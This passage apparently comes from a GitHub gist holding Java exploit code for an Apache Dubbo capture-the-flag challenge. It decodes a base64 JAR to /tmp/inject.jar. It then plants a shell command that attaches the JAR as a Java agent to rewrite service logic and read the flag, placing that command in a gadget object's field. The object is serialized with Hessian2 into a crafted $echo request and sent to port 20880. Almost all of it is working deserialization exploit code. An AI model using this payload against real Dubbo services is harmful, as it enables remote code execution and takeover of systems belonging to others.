AAAAAAAAnAAAAAAAAAAAAEADtQZEBAABNRVRBLUlORi9tYXZlbi9vcmcuZXhhbXBsZS9hZ2VudF9kdWJiby9QSwECFAMUAAgICADOWY5VMq0mvnwDAABmBgAAFgAAAAAAAAAAAAAApIHWAQAAaGFjay9NeUFnZW50TWFpbi5jbGFzc1BLAQIUAxQACAgIAM5ZjlVEkks+cwMAAJUGAAAYAAAAAAAAAAAAAACkgZYFAABoYWNrL1Rlc3RBZ2VudE1haW4uY2xhc3NQSwECFAMUAAgICADOWY5Vg5UfcQ8GAACMDAAAKAAAAAAAAAAAAAAApIFPCQAAaGFjay9NeUFnZW50TWFpbiREZWZpbmVUcmFuc2Zvcm1lci5jbGFzc1BLAQIUAxQACAgIAMhZjlXNSZodbwIAAJUHAAAuAAAAAAAAAAAAAACkgbQPAABNRVRBLUlORi9tYXZlbi9vcmcuZXhhbXBsZS9hZ2VudF9kdWJiby9wb20ueG1sUEsBAhQDFAAICAgAzlmOVUFySyhgAAAAXwAAADUAAAAAAAAAAAAAAKSBfxIAAE1FVEEtSU5GL21hdmVuL29yZy5leGFtcGxlL2FnZW50X2R1YmJvL3BvbS5wcm9wZXJ0aWVzUEsFBgAAAAALAAsAJgMAAEITAAAAAA== | base64 -d > /tmp/inject.jar')\"";
//执行/tmp/inject.jar,修改远程服务方法逻辑,读取flag
String cmds = "python3 -c \"import os;os.system('/dubbo/java/jdk1.8.0_202/bin/java -Dfile.encoding=UTF-8 -classpath /dubbo/java/jdk1.8.0_202/lib/tools.jar:/tmp/inject.jar hack.TestAgentMain')\"";
setFieldValue(unix, "lpcFirstCom",new String[]{cmds,cmds,cmds});
JSONObject jo = new JSONObject();
jo.put("oops",unix);
/////////############################################
out.writeUTF("xxxxx");
out.writeUTF("org.apache.dubbo.registry.RegistryService");
// out.writeUTF("org.apache.dubbo.metadata.MetadataService");
// out.writeUTF("DemoService");
out.writeUTF("0.0.0");
out.writeUTF("$echo");
out.writeUTF("Ljava/lang/Object;");
out.writeObject(jo);
HashMap hkhash = new HashMap();
hkhash.put("aaa","bbb");
out.writeObject(hkhash);
out.flushBuffer();
Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
byteArrayOutputStream.write(header);
byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
byte[] bytes = byteArrayOutputStream.toByteArray();
Socket socket = new Socket("127.0.0.1", 20880);
OutputStream outputStream = socket.getOutputStream();
outputStream.write(bytes);
outputStream.flush();
outputStream.close();
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment